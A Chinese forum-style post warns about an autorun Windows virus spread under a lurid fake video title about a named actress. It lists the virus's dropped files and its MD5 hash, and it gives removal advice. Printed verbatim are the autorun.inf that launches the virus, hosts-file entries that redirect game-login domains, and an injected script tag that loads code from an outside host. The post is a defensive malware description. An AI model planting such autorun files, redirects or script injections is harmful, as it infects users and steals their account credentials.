刚才一个朋友告诉我说电脑中毒了,是刘嘉玲被强奸录象,我被雷到了……
搜索了一下,结论如下:
文件名:kvtrwkcc.exe
MD5:773DEB311ED59F6D48CCD2EC29241F77
现象描述:
该病毒会在磁盘根目录下生成autorun.inf和kvtrwkcc.exe,在%systemroot%system32下生成下列文件
aevqgb.dll
aevqgb.nls
arlin.dll
arlin.exe
kvtrwkcc.exe
musz1s.dll
musz2s.dll
MuTemp.exe
pksetexd.exe
pksetexd.inf
刘嘉玲被强奸录象.exe
其中pksetexd.inf即为autorun.inf的配置文件
内容为
引用:
[AutoRun]
shell\open=打开(&O)
shell\open\Command=kvtrwkcc.exe
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=kvtrwkcc.exe
在%systemroot%system32\drivers目录下生成
Cdaudio.sys
并替换
beep.sys
修改hosts文件,添加
61.191.52.111 sdch.sdo.com
61.191.52.111 ekey.sdo.com
61.191.52.103 mir2.sdo.com
61.191.52.111 kf.sdo.com
61.191.52.103 www.mir2.com.cn
61.191.52.103 mir2.com.cn
61.191.52.103 home.mir2.sdo.com
61.191.52.103 shandacs.allyes.com
61.191.52.103 home.woool.sdo.com
61.191.52.103 woool.sdo.com
61.191.52.111 pwd.sdo.com
61.191.52.111 www.sdo.com
注:以下是这个病毒有意思的地方,它会遍历磁盘,从最后一个分区开始感染html脚本文件,在尾部添加
</html><script src=http://tw.lovechina.tw.cn/count/js/gif.gif></script>
并且在压缩包内添加刘嘉玲被强奸录象.exe文件,压缩包中的压缩包或文件夹不会被感染,打开网页搜索“病毒”网页自动关闭,注册表禁用,无法查看隐藏文件……
危害:
因为该病毒是文件夹图标,加上诱惑性的名字,欺骗用户点击,很容易上当,另外,那些被感染的脚本文件,稍不注意,可能会再次感染病毒
可以用Autorun病毒防御者 查杀,建议杀完后重装一次系统。